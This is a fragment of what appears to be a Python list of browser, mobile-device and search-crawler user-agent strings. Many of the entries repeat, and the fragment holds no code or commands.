'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
